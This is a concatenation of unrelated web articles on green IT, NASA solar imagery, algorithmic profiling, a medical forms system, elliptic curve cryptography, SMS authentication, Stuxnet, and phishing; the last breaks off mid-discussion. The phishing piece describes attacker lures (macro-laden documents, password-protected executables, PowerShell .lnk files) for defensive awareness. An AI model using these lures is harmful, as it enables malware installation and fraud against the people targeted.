The good news, however, is that “this would challenge IT managers and companies that purchase IT and telecom equipment in large quantities to rethink the way they manage the demand for and supply of IT services, as well as their use of IT applications,” the article said. “At the same time, companies that make everything from control devices to computer components, software to networking gear, will have a big incentive to invest in energy-saving products and services and thus help to reduce greenhouse gas emissions.”
The bottom line for IT professionals is, “Increasing demand for information and communications technologies that promote abatement will create attractive growth opportunities for those companies.”
It looks like 2009 could spell greener pastures for IT professionals with a little creativity.
– Agatha Gilmore, firstname.lastname@example.org | <urn:uuid:b37b6c59-8376-45fd-ac86-66873057fcaa> | CC-MAIN-2017-04 | http://certmag.com/it-in-2009-greener-pastures/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00021-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.94131 | 989 | 3.15625 | 3 |
The following information comes from NASA.
This video shows three years of the sun recorded by NASA's Solar Dynamics Observatory (SDO) at a pace of two images per day.
The images shown here are based on a wavelength of 171 Angstroms, which is in the extreme ultraviolet range and shows solar material at around 600,000 Kelvin.
During the course of the video, the sun subtly increases and decreases in apparent size. This is because the distance between the SDO spacecraft and the sun varies over time. The image is, however, remarkably consistent and stable despite the fact that SDO orbits the Earth at 6,876 miles per hour and the Earth orbits the sun at 67,062 miles per hour.
There are several important events that appear briefly in this video. They include the two partial eclipses of the sun by the moon, two roll maneuvers, the largest flare of this solar cycle, comet Lovejoy, and the transit of Venus. The specific time for each event is listed below.
00:30 Partial eclipse by the moon
00:31 Roll maneuver
01:11 August 9, 2011 X6.9 Flare, currently the largest of this solar cycle
01:28 Comet Lovejoy, December 15, 2011
01:42 Roll Maneuver
01:51 Transit of Venus, June 5, 2012
02:28 Partial eclipse by the moon
This video comes via NASAexplorer. | <urn:uuid:3531ce21-f9f6-4384-ab25-1cb4b9b7aad4> | CC-MAIN-2017-04 | http://www.cio.com/article/2370459/internet/three-years-of-the-sun-in-three-minutes.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00443-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.91232 | 292 | 3.640625 | 4 |
Corporations and government are using information about us in a new – and newly insidious – way. Employing massive data files, much of the information taken from the Internet, they profile us, predict our good or bad character, credit worthiness, behavior, tastes, and spending habits – and take actions accordingly.
As a result, millions of Americans are now virtually incarcerated in algorithmic prisons.
Some can no longer get loans or cash checks. Others are being offered only usurious credit card interest rates. Many have trouble finding employment because of their Internet profiles. Others may have trouble purchasing property, life, and automobile insurance because of algorithmic predictions. Algorithms may select some people for government audits, while leaving others to find themselves undergoing gratuitous and degrading airport screening.
An estimated 500 Americans have their names on no-fly lists. Thousands more are targeted for enhanced screening by the Automated Targeting System algorithm used by the Transportation Security Administration. By using data including "tax identification number, past travel itineraries, property records, physical characteristics, and law enforcement or intelligence information," the algorithm is expected to predict how likely a passenger is to be dangerous.
Algorithms also constrain our lives in virtual space. They determine what products we will be exposed to, analyze our interests, and play an active role in selecting the things we see when we visit a particular website.
Eli Pariser argues in The Filter Bubble: "You click on a link, which signals your interest in something, which means you are more likely to see articles about that topic," and then "You become trapped in a loop…" The danger is that you emerge with a very distorted view of the world.
If you’re having trouble finding a job as a software engineer, it may be because you got a low score from the Gild, a company that predicts the skill of programmers by evaluating the open source code they have written, the language they use on LinkedIn, and how they answer questions on software social forums.
Algorithmic prisons are not new. Even before the Internet, credit reporting and rating agencies were a power in our economy. Fitch, Moody’s, and Standard & Poor’s have been rating business credit for decades. Equifax, the oldest credit rating agency, was founded in 1899.
When algorithms get it right (and in general they do a pretty good job), they provide extremely valuable services to the economy. They make our lives safer. They make it easier to find the products and services we want. Amazon constantly alerts me to books it correctly predicts I will want to read. They increase the efficiency of businesses.
But when algorithms get it wrong, real suffering follows.
Most of us would not be concerned if ten or a hundred times too many people ended up on the TSA’s enhanced airport screening list as long as an airplane hijacking was avoided. In times when jobs are scarce and applicants many, most employers would opt for tighter algorithmic screening. There are lots of candidates to hire and more harm may be done by hiring a bad apple than by missing a potentially good new employee. And avoiding bad loans is key to the success of banks. Missing out on a few good ones in return for avoiding a big loss is a decent trade off.
But we’ve reached the point where, in many cases, private companies and public institutions stand to gain more than they will lose if a lot of innocent people end up in algorithmic prison.
A related concern is this: surveillance has become automated through the use of Internet tools, data captured from cellular phones and low-cost cameras, and the ability to analyze big databases economically. As a result, it has become much easier -- and a lot less costly -- to construct algorithmic prisons. Not only can we expect to see a great increase in the number of algorithmic prisons, but thanks to cheaper and more efficient tools the value derived from establishing them will increase.
A number of services already facilitate the creation of algorithmic prisons. Acxiom, for instance, a marketing services company, monitors 50 trillion transactions annually and maintains about 1,500 data points on 500 million consumers worldwide. That same database can serve as a key component in the construction of an algorithmic prison.
There are other features of algorithmic prisons that a latter-day antagonist in a tale by Kafka might have dreamed up. A consumer or job seeker might know only that he has trouble getting credit or a job interview. What he may not know is that the bars of an invisible prison are keeping him from reaching his goal.
The federal Consumer Financial Protection Bureau lists more than 40 consumer-reporting companies. These are services that provide reports for banks, check cashers, payday lenders, auto and property insurers, utilities, gambling establishments, rental companies, medical insurers, and companies wanting to check out employment history. The good news is that the Fair Credit Reporting Act requires those companies to give consumers annual access to their reports and allows a consumer to complain to the Consumer Financial Protection Bureau if he is being treated unfairly.
Good luck with that.
Even if an algorithmic prisoner knows he is in a prison, he may not know who his jailer is. Is he unable to get a loan because of a corrupted file at Experian or Equifax? Or could it be TransUnion? His bank could even have its own algorithms to determine a consumer’s creditworthiness. Just think of the needle-in-a-haystack effort consumers must undertake if they are forced to investigate dozens of consumer-reporting companies, looking for the one that threw them behind algorithmic bars. Now imagine a future that contains hundreds of such companies.
A prisoner might not have any idea as to what type of behavior got him sentenced to a jail term. Is he on an enhanced screening list at an airport because of a trip he made to an unstable country, a post on his Facebook page, or a phone call to a friend who has a suspected terrorist friend?
Finally, how does one get his name off an enhanced screening list or correct a credit report? Each case is different. The appeal and pardon process may be very difficult—if there is one.
It is impossible to fathom all the implications of algorithmic prisons. Yet a few things are certain: even if they do have great economic value for businesses, and even if they do make our country a safer place, as they continue to proliferate, many of us will be injured, seriously inconvenienced, or greatly frustrated as a result.
Even if we all believed algorithmic prisons present a serious threat to individual freedom, it would be difficult to come up with a reasonable solution to the problems they create.
I would personally favor requiring all companies to destroy within, say, 48 hours, all data collected about me unless I have given explicit permission otherwise. I would also prohibit the sale of my personal information or its use for advertising.
Well, that is a nice idea but it is fraught with problems. Under those rules, accurate credit reports would be impossible. And I would want law enforcement agencies to have access to all that information subject to the right restrictions and oversight. If the data is destroyed, that would be impossible.
What is clear is that the consumer protections in place at the moment do not suffice. An additional set of carefully constructed restrictions is required. Being held in any number of algorithmic prisons is a scenario I for one do not want to be caught up in. And I doubt I am alone.
| <urn:uuid:4b4201e6-25e3-4705-b39e-e8b027a6be72> | CC-MAIN-2017-04 | http://www.nextgov.com/big-data/2014/02/commentary-welcome-algorithmic-prison/79196/?oref=ng-dropdown | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00563-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953626 | 1,534 | 2.53125 | 3 |
OIO is an application development environment that is designed for users, not programmers. It is essentially a tool for creating Web-based forms and reports that serve as a front-end to a Postgres, Oracle or other database.
OIO is designed for the medical world. The project's Web site -- http://www.txoutcome.org -- describes it as "a highly flexible web-based data management system that manages users, patients, and information about patients."
A priesthood of programmers
Ho aims to revolutionize application development by enabling users to do the work themselves, without calling on what he calls the "priesthood of programmers," where people who know C++ or Java serve as an interface to the technology.
There is "significant overhead" in the development of most applications today, he says, "with programmers interviewing users, trying to figure out what they want, building something, and going back and asking them if that's what they had in mind."
It can take more time to describe what you want to someone else than to do it yourself, says Ho. "That's why we don't have secretaries typing up letters anymore. We'll still need programmers, but not for the same things as we do now."
Ho compares OIO with the advent of sophisticated end-user tools like spreadsheets or desktop databases such as FileMaker or Microsoft's Access, which enabled non-programmers to create applications that previously could only be created using programming languages like Cobol or C.
OIO's object-oriented interface means that end users can customize OIO forms to meet their needs without having to know the structure of the underlying database. "They can create forms or reports without knowing anything about Postgres or Oracle, or how many tables they're using. For them it's just a matter of defining the forms," he says.
Ho began working on OIO in 1998. Today it is in use in the Psychiatry department at Harbor-UCLA Medical Center, both for tracking patient information and for research. It's also in use in the departments of rheumatology and surgery there, as well as in the medical school at the University of Pennsylvania, and several hospitals abroad. Several other hospitals are evaluating it, including Case Western Reserve University Hospital in Cleveland, which is considering using OIO for tracking anesthesia outcomes.
OIO is based on the open source application server Zope, and written using the open source scripting language Python. Because it is entirely open source, says Ho, it's easy to share work done at UCLA or elsewhere with colleagues across the country, and doctors can easily customize OIO's forms to meet their specific needs.
"Most of the information that we doctors record is the same," Ho says, "with only perhaps 10% difference between sites. OIO aims to allow customization, really quickly, by anyone, including non-programmers, and then allow them to share it easily with other users."
Being able to customize the forms also means that data can be shared between clinical departments and researchers, according to Ho.
"A lot of researchers are very interested in mining clinical data," he says "but there are obstacles standing in the way, both legal, such as patient consent and confidentiality, and technical. You can strip a number of fields off of clinical data to make it anonymous, but with commercial software, it's not easy. Our system makes it easy to do that, so you can make it anonymous at very low cost, which enables research to happen." | <urn:uuid:66c844b8-c5dd-4cd1-884b-cf5042711581> | CC-MAIN-2017-04 | http://www.cioupdate.com/trends/article.php/2234601/An-Open-Source-Approach-To-Developing-Applications----Without-Programmers.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00379-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963029 | 722 | 2.625 | 3 |
3.5.1 What are elliptic curve cryptosystems?
Elliptic curve cryptosystems were first proposed independently by Victor Miller [Mil86] and Neal Koblitz [Kob87] in the mid-1980s. At a high level, they are analogs of existing public-key cryptosystems in which modular arithmetic is replaced by operations defined over elliptic curves (see Question 2.3.10). The elliptic curve cryptosystems that have appeared in the literature can be classified into two categories according to whether they are analogs to the RSA system or to discrete logarithm based systems.
Just as in all public-key cryptosystems, the security of elliptic curve cryptosystems relies on the underlying hard mathematical problems (see Section 2.3). It turns out that elliptic curve analogs of the RSA system are mainly of academic interest and offer no practical advantage over the RSA system, since their security is based on the same underlying problem, namely integer factorization. The situation is quite different with elliptic curve variants of discrete logarithm based systems (see Question 2.3.7). The security of such systems depends on the following hard problem: Given two points G and Y on an elliptic curve such that Y = kG (that is, Y is G added to itself k times), find the integer k. This problem is commonly referred to as the elliptic curve discrete logarithm problem.
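To make the problem concrete, here is a toy sketch of curve arithmetic over a deliberately tiny prime field (the parameters are invented for illustration, and real curves are hundreds of bits wide; the modular inverses via pow need Python 3.8 or later):

P, A = 97, 2  # toy curve y^2 = x^3 + 2x + 3 over GF(97)

def add(p1, p2):
    """Elliptic curve point addition; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None  # a point plus its inverse is the point at infinity
    if p1 == p2:
        s = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P  # tangent slope
    else:
        s = (y2 - y1) * pow(x2 - x1, -1, P) % P         # chord slope
    x3 = (s * s - x1 - x2) % P
    return (x3, (s * (x1 - x3) - y1) % P)

def mul(k, point):
    """Compute k*point by double-and-add."""
    result = None
    while k:
        if k & 1:
            result = add(result, point)
        point, k = add(point, point), k >> 1
    return result

G = (3, 6)         # a point on the curve: 6^2 = 36 = 3^3 + 2*3 + 3 (mod 97)
Y = mul(3, G)      # computing Y = kG is fast
print(Y)           # (80, 87); recovering k from (G, Y) is the elliptic curve
                   # discrete logarithm problem: trivial by brute force at this
                   # toy size, infeasible at the sizes used in practice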
Presently, the methods for computing general elliptic curve discrete logarithms are much less efficient than those for factoring or computing conventional discrete logarithms. As a result, shorter key sizes can be used to achieve the same security of conventional public-key cryptosystems, which might lead to better memory requirements and improved performance. One can easily construct elliptic curve encryption, signature, and key agreement schemes by making analogs of ElGamal, DSA, and Diffie-Hellman. These variants appear to offer certain implementation advantages over the original schemes, and they have recently drawn more and more attention from both the academic community and the industry. | <urn:uuid:dc353d31-3611-4839-99ef-1d494ed71386> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-are-elliptic-curve-cryptosystems.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00379-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948452 | 442 | 3.25 | 3 |
Whether you’re at the cash machine, online to your bank or credit card company or on the phone to your insurance or mortgage provider, until now, the need for greater security has meant added complexity and cost for user and provider alike.
In future, this problem is sure to grow. Consumer-facing organisations want the efficiencies to be gained from e-commerce technologies, and are moving inexorably towards a Web-based interface with their customers.
That could mean asking consumers to navigate increasingly complex layers of password-based authentication, which discourages them from trusting the security of online transactions — only 10 per cent of consumers bank online for this reason. They could also be faced with remembering growing numbers of passwords, enterprises will need to divert scarce resources to helping users recall those passwords, and will continue to have to bear the costs of theft or mistakes following authentication failures.
Yet it doesn’t have to be like that. Security technology can ensure that you keep what’s yours while enabling you to get on with life, letting technology take care of the details. Strong authentication of users that is both easy to use and cost-effective is the answer.
Authentication in a complex world
Consumers in today’s world spend a growing amount of time authenticating their identities to banks, insurance companies, utilities and phone companies, for instance. Before such organisations can process any transactions or information, they need to know that users are who they say they are. In other words, authentication of identity is critical or no trust can exist between the two parties.
Right now, that process consists of what you know — almost invariably a user name and password combination — and, where stronger authentication is required, what you have. This usually takes the form of a hardware or software token that generates a second code or PIN; the combination is known as two-factor authentication.
Names and passwords have a long tradition, going back centuries. They worked well when the numbers to be dealt with were small and a person’s identity could be confirmed by looking at them. In today’s world, that’s not practical, yet reliance continues to be placed in this method, despite its well-publicised weaknesses.
The key problem is that passwords are too easily discovered or guessed — they are often found written down on sticky notes stuck to monitors, for instance. Even when they’re not, passwords can often be derived from well-known information about the user such as their birthday, or spouse, partner or pet’s name. Further, because it’s hard to remember passwords that aren’t standard words — especially as the number of passwords required increases — the average password can often be discovered by a computer attack. This can be achieved using a dictionary or, more time-consuming but ultimately effective, a brute-force lookup that checks every possible combination of characters.
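To see why, it helps to count: the search space for short, single-class passwords is tiny by machine standards (a rough back-of-the-envelope sketch):

# Size of the search space for an all-lowercase password of length n:
for n in range(4, 9):
    print(n, 26 ** n)
# Eight lowercase letters is only about 2 * 10^11 guesses - well within
# reach of an offline attack; adding length and character classes grows
# the space exponentially.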
In a corporate environment, end user education as a cornerstone of company security policy can often be the answer to this problem, along with forcing users to update their passwords regularly, and checking the strength of passwords using cracking programs. For consumer applications however, none of these options is realistic. Give customers what they perceive to be a hard time, and a business risks driving them into the arms of the competition.
The mobile future secured
Passwords on their own are too weak to enable full trust; the alternative is two-factor authentication, which has proven close to unbreakable and is the strongest form of authentication available. Its drawback in a consumer application is that it is not realistic to expect consumers to carry an additional, special device whose sole function is authentication.
A much better answer is to reap the benefits of two-factor authentication by generating a new password for every authentication using a device that the user already has with them. Research shows that the one device most users both possess and carry with them is their mobile phone.
The way this could work is that the user initiates a transaction, enters their PIN or access code, then the provider of services needing to authenticate someone sends a randomly generated password via SMS to their phone, which they can enter. This proves that they are the right person — a miscreant is highly unlikely to know the user name, the password and possess the phone. And if they are using a browser, a user must enter their access code into the same browser from which they requested it. The ideal solution would also provide non-repudiation, encryption over the link where possible, and would generate passwords that were truly random.
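A hedged sketch of the server side of such a flow; send_sms is a stand-in, since no particular gateway is implied:

import secrets
import time

PENDING = {}  # user -> (one-time code, expiry timestamp)

def send_sms(phone, text):
    print(f"SMS to {phone}: {text}")  # placeholder for a real SMS gateway

def start_login(user, phone):
    code = "".join(secrets.choice("0123456789") for _ in range(6))
    PENDING[user] = (code, time.time() + 120)  # valid for two minutes
    send_sms(phone, f"Your one-time code is {code}")

def verify(user, entered):
    code, expiry = PENDING.pop(user, (None, 0.0))  # pop: each code works once
    return (code is not None and time.time() < expiry
            and secrets.compare_digest(code, entered))

start_login("alice", "+44 7700 900123")
print(verify("alice", "000000"))  # False unless the guess matches the SMS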
This form of strong authentication shows huge promise. Trials by a number of service providers suggest there are few drawbacks, with the small cost of sending an SMS being offset by the security of knowing they are dealing with the right person.
Compared to other forms of two-factor authentication, the advantages are that:
- such a system would need no extra infrastructure, so deployment costs on a per-user basis will be low;
- because the user is familiar with the hardware, there are no additional training or help desk costs to be borne;
- in some cases, it may help compliance with government, industry, or enterprise regulations for data protection;
- it can be deployed in very large numbers to cover mass markets;
- the user need carry no extra devices around, adding convenience and enabling enterprises to differentiate themselves;
- consumer confidence both in the strength of that security and the protection of their investments from access by the unauthorised will be increased, leading to customer satisfaction and retention.
Only the need for a mobile phone network limits coverage and, even in the US where SMS is not as popular as it is in Europe, trials show that messages both work and travel quickly — one outer limits trial reported a delay between the UK and the US west coast of just four seconds.
When authentication via SMS becomes widespread, businesses and consumers will benefit. In the financial services area, banks and insurance companies are clear beneficiaries. In business to consumer applications, healthcare — ensuring that the consumer is matched, critically, with the right medical records — and bill payment will be transformed. Service providers and enterprises will be able to offer unfettered access to remote users’ desktops no matter where they are, secure that the user can prove their identity.
From a business-to-business perspective, such technology can facilitate supply and buy-side e-commerce, with partners and suppliers being able to authenticate and so gain access to secured extranets, increasing trust between the parties conducting transactions.
Right now, access to information is critical for businesses and consumers alike and this trend is set to grow. What’s needed is a way of authenticating people on a mass-market scale, and using a widely-adopted, easy-to-use technology such as SMS means that access can be secure, more cost-effective and more convenient.
RSA Security’s RSA Mobile, built on its patented, time-synchronous technology and algorithms that deliver proven security to around 13 million end users, provides a platform for consumer-facing organisations to build such a solution. So with RSA Security ready to bring its secure technologies to this market and to fully incorporate industry standards such as Liberty and SAML into future releases, the time is right for this technology.
Both industry and consumers need it, the pre-conditions have been met and the demand is there.
Infosecurity Europe is Europe’s largest and most important information security event. Now in its 8th year, the show features Europe’s most comprehensive FREE education programme, and over 200 exhibitors at the Grand Hall at Olympia from 29th April – 1st May 2003. www.infosec.co.uk | <urn:uuid:0c0b316a-aa88-4d4c-ba28-ef10f062d2df> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2003/04/09/mass-market-authentication-the-gateway-to-access-hungry-consumers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00195-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955615 | 1,584 | 2.625 | 3 |
Professor of Economics
Lincoln University, New Zealand
Social Scientist, GNS Science and Director of the Joint Centre for Disaster Research
Massey University, New Zealand
Dr. Thomas Pratt
US Geological Survey, Department of the Interior
Canterbury Department of Emergency Management
Earthquakes in the central and eastern U.S. are rare (low-probability) events, but the M5.8 Virginia earthquake in 2011 reminded us that earthquakes can and will occur where least expected. Every earthquake has some consequences and, fortunately, the Virginia event was centered far away from any urbanized areas where it could have caused significant damage and injuries. This was not the case for the Canterbury region of New Zealand. The low-probability earthquakes that struck in 2010 and 2011 had dire consequences: the M5.5 to M6.3 earthquakes destroyed most of the urban center of Christchurch, killed 185 people, injured over 6,000, and caused losses totaling 20% of New Zealand’s GDP.
This session spotlights the lessons learned in New Zealand. Experts from there who have both personal and professional roles contending with the immediate and long-term consequences of the Canterbury earthquakes will share their real-life experiences. Session discussion will put these lessons into a U.S. context, touching on what could happen if the Virginia earthquake occurred closer to an unsuspecting central or eastern U.S. city and how we might become more resilient physically and economically, not just to the hazards posed by local earthquakes, but by earthquakes worldwide. Topics include:
- What worked and didn’t work during the response and recovery phases of a major disaster in an environment very similar to that in many moderate-sized US cities,
- What nature can deliver and the potential impacts in a typical, long-lived earthquake sequence,
- Earthquake hazard forecasts regionally and globally. | <urn:uuid:3be470bf-0df8-4662-a870-48e8ddde5139> | CC-MAIN-2017-04 | https://govsecinfo.com/events/govsec-2014/sessions/wednesday/slp2-3.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00407-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948683 | 369 | 2.78125 | 3 |
Never Trust the Client
Never trust the client
The customer is always right, but client input should always be assumed to be wrong. Data can be malformed accidentally or maliciously. But either way, it has the potential to cause problems.
Perl provides some excellent tools to sanitize external input data. Make sure that you're stripping "special" characters from input, avoid storing user-supplied HTML and be careful where you're storing user-supplied data. Perl's "taint" mode will also mark data generated outside your program as tainted so that it cannot accidentally be used as a file name or subprocess command.
"Don't trust data supplied by the browser" should be the foremost rule of thumb.
Your data is yours
You should be very conservative about data that's accepted as input, and even more conservative about data that is sent out. Make use of the security features available when connecting to your database. Most databases can work with SSL or have other features to ensure that communication between an application server and a database server is encrypted. It's also a good idea to store data in an encrypted state in case an attacker gets as far as gaining access to your data store.
Legacy systems or applications may be constructed in such a way that a native encrypted connector is not possible. That's suboptimal, but not impossible to fix. Use a Secure Shell (SSH) tunnel between systems when SSL is not natively supported by the database connector.
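And for data at rest, a sketch using Python's third-party cryptography package (an assumption for illustration; the equivalent Perl route is the Crypt::* family mentioned below):

from cryptography.fernet import Fernet

key = Fernet.generate_key()  # in practice, load this from a proper key store
box = Fernet(key)

ciphertext = box.encrypt(b"card=4111111111111111")
# Store only the ciphertext; a stolen database dump then reveals nothing useful.
print(box.decrypt(ciphertext))  # b'card=4111111111111111'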
Ensure that session data is encrypted. Any session exchanging personal data between your application and the user over a network should be encrypted, but also look to encrypting session state information when storing session data in a URL. The Crypt::* modules will provide the proper tools to do this and also look to the CGI::EncryptForm module. | <urn:uuid:b157d284-f2cc-4175-ae45-d714020ae9a2> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Database/How-to-Integrate-LargeScale-Databases-with-Perl/1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00223-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927727 | 369 | 2.921875 | 3 |
Whatever its origin, the Stuxnet worm provided something that few publicly-debated online incidents have offered to date.
For at least 15 years, security experts have warned that cyber attacks would one day strike at “critical infrastructure” – whether it’s power grids, energy supply, air traffic control (in the more extreme imagination of Richard Clarke, at least), emergency services and so on.
Real-world incidents have been limited, however: most countries have no single electricity “off-switch” accessible from the Internet, for example. In attacking SCADA software, Stuxnet has acted as a proof-of-concept for something rarely seen in the wild. Arguably, it also demonstrated that environments like SCADA systems are, to date, not typically Internet-connected: its medium of infection was USB keys.
But in a world that’s probably growing weary of the jump-at-shadows mindset of IT security journalism, Stuxnet wasn’t a shadow but a real event.
Dr Prescott Winter, former director and CIO of the US National Security Agency and now CTO (Public Sector) for security vendor ArcSight, argues that it’s time for governments to take a more active role in finding ways to secure the Internet.
Speaking to journalists in Sydney in early October as part of an ArcSight national roadshow, Dr Winter said that while private industry (particularly in America) might chafe at government intervention and regulation of the online world, it’s as inevitable as regulation of air traffic became in the 20th century.
The prime manifestation of the problem, Dr Winter said, is the ongoing problem of the “botnet”. Individuals at home aren’t protected, he told the roadshow; their computers become incubation grounds for botnets.
“Some kind of protective process to clean that up is absolutely essential,” he said.
“There are botnets residing in millions of home computers around the world, and those can be turned-on ‘like that’.”
Today’s “scattershot” approach to the botnet problem isn’t enough protection, he said: “we have bans on aircraft ... bans on ‘bad packets’ is an area governments need to work on.”
And that in itself is a challenge. The “bad packet” problem is international – and around the world, the relationship between the government and the private sector changes from country to country.
Dr Winter said America may not even be the best country to take the lead in protecting Internet users, because of its historical gulf between government and the private sector. As a result, an effort like the IIA’s Internet code of practice is “almost unimaginable in the US.
“I think this case in Australia is going to be very interesting to watch. It seems to have come about with a group of the leading ISPs and service providers coming together to design this solution.
“There are a lot of things it doesn’t have in it yet – but as an initial outline for a policy framework to clean up ... the Australian part of the Internet, it is certainly a commendable start. Eventually, you probably want to make sure that you have all your service providers involved.”
Worms and the Real World
Given that “physical attacks” – damage to infrastructure, attacks on emergency services and the like – hold such a high profile in the popular mind, it’s interesting that Dr Winter nominated attacks against intellectual property as today’s leading concern.
One reason, he said, is that “some action has been taking in protecting the critical systems ... for example, the FAA is getting a complete rebuild from the ground up.”
The shift in emphasis “from catastrophic failure to IP”, Dr Winter said, is because “the steady drain of intellectual property out of the leading technical nations of the world is a major cause for concern.
The investment in developing products and services, he said, is in danger of “leaking” to countries like China, but “IP protection and the integrity of the supply chain are currently lower on most peoples’ threat radar than a catastrophic cyber ‘Pearl Harbour’”.
Security, software and the Cloud
Security would seem to provide a great marketing entree for cloud providers: if everything the home user needs can be hosted by a cloud provider, the user’s exposure to threats could fall dramatically.
However, it’s not playing out that way.
“I don’t think there’s as much progress as any of us would like to see ... we have had some discussions with people at Microsoft about trust models you can begin to build into the Internet.”
“App store” markets are another area Dr Winter would like to see paying more attention to security, since users place an implicit trust in the integrity of the software they download from an app store.
That, however, leads to the vexed question of software quality. If cloud providers and app sellers are expected to warrant that their software is secure, shouldn’t a similar requirement apply to the whole software industry, which typically escapes liability with disclaimers?
Yes: “The software industry has gotten away with murder on this point forever,” Dr Winter said. “Deploy, then fix, is the old habit of the software industry, and that model isn’t viable in the cloud.”
He said software quality processes need to be put into place industry-wide (and world-wide), and this will represent a culture-shock for the software industry. | <urn:uuid:5538299e-e990-4cb0-b0dd-bc5a0e03a503> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/2240022922/Expect-Internet-regulation-Former-NSA-CIO-Prescott-Winter | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00436-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956439 | 1,222 | 2.640625 | 3 |
Phishing, and particularly spear phishing, may be low tech, but it remains one of the most potent tools in the cyber criminal’s toolbox. In the past it has usually been used for financial crimes, along with some industrial and national espionage, but there is an alarming increase in attacks aimed at more general intelligence gathering. These may have the aim of discrediting the target organization. Enterprises such as think tanks and universities must now consider themselves potential targets for attacks from nation state actors or hactivists, and take appropriate precautions.
Traditional bulk phishing has very often been aimed at stealing money by obtaining access to financial accounts. PayPal was an early target because of the ease of initiating online transfers. The collection of credit card information or online banking credentials is also commonly attempted. We also see phishing for simple email or messaging credentials that can be used to send further spam.
Bulk spam based phishing of this sort continues to be an annoyance, but is less of a problem than it used to be. Good spam filters will stop the vast majority, and many people are aware of the problem and hopefully less likely to give away their account information to a casual spammer. In fact, developers of phishing tools are now trying to sell these tools cheaply for others to exploit, which is probably a sign that they are not as profitable as they used to be. Here’s a PayPal phishing tool (that also attempts to collect credit card and bank account details) available on the web for $20 in bitcoin.
The fact that this and similar tools are being sold rather than used directly by the creators is probably an indication that PayPal phishing is not as profitable as it used to be.
However spear phishing (that is phishing customized to a particular person or organization), continues to be a significant problem, and as we have reported in the past it is the entry point for a number of the most devastating attacks.
Many spear phishing attacks, especially those aimed at corporate executives, are also financially motivated. One popular attack is an email apparently from a CEO to a CFO with real names and a realistic looking From: address, which requests a wire transfer of some six or seven figure sum to an offshore account. Another is the attempt to obtain employee tax information, to be used in subsequent tax fraud. In some cases phishing may just be an attempt to compromise any account on a corporate network in the hope of escalating privileges to collect credit card data from a point of sale system, as happened in the Target breach.
Spear phishing has also been used for espionage, both industrial and national. Industrial espionage usually seems to be conducted by nation state actors who are passing information about competitors to corporations with close ties to the national government. There have also been successful attacks against a number of US government departments, including the Whitehouse, the State Department, the Joint Chiefs of Staff, and the Office or Personnel Management. In many of these cases we know that spear phishing created the initial breach. Though there have been a few cases such as ThyssenKrupp and Sony Pictures where attacks based on spear phishing have led to actual damage to plant or systems, in most cases the espionage has been limited to intelligence gathering.
Cyber attackers are discovering that the value of intelligence is not limited to data collected from major corporations or governments. The hacking and publication of emails from the Democratic National Committee and the Clinton campaign had a significant and perhaps decisive effect on the recent US election. Attribution of cyber attacks is difficult, but several sources point the finger for this breach on a group known as Cozy Bear (aka The Dukes, aka APT27) who are believed to be working for the Russian government.
Cozy Bear’s intelligence gathering has not been limited to the Clinton campaign. Since July 2015 they have been targeting think tanks, universities, and non-governmental organizations with interests in defense, national security, public policy, and international affairs. Most recently they took advantage of the surprise US election result to send out several waves of election related phishing emails, including some purporting to come from the Clinton Foundation. A system administrator at a think tank or university might not think they need the same sort of security as the State Department or the Joint Chiefs of Staff, but the same cybercriminals are targeting them.
The techniques used by Cozy Bear do not rely on sophisticated zero day exploits. Zero days are expensive to buy or locate, and will most likely be discovered and patched if you start using them regularly. Instead, Cozy Bear simply tricks the user into installing malware on their machine. We see very similar techniques used by ransomware and other forms of malware spam: malicious executables in password protected compressed files, documents containing malicious macros, and .lnk files containing PowerShell scripts.
Putting an executable in a password protected compressed file means that virus-scanning software cannot review and block the executable. The password is included in the body of the email message. Encrypting an attachment and then including the password in plain text in the message adds no security whatsoever except protection against virus-scanning, so it should be regarded as a big red flag.
Microsoft Office has long supported a powerful macro language, Visual Basic for Applications, for automating tasks within documents. Unfortunately these tasks can include the installation of malware over the Internet. As a security measure macros are disabled by default on downloaded content, and the user must click on a button to turn them on. Rather than give the button a meaningful label like, “Click This Button To Make The Entire Contents Of Your System Available To Russian Hackers,” it is called, “Enable Content”. Spammers use various forms of social engineering in the documents to trick users into turning on macros. Here’s an example of a malware installer.
If you do not need them, we would recommend disabling Office macros globally. System administrators can do this for an organization using a group policy.
PowerShell is a Windows scripting language released in November 2006 that allows the automation of administrative tasks. Yes, this can include the installation of malware over the Internet as well. .lnk files are usually used to contain browser links, but they can also be used to link to a file on your own computer, or even run a PowerShell script encoded in the .lnk file. Thanks, Microsoft. It is possible to disable PowerShell for an enterprise but this may be problematic as it frequently used for system administration.
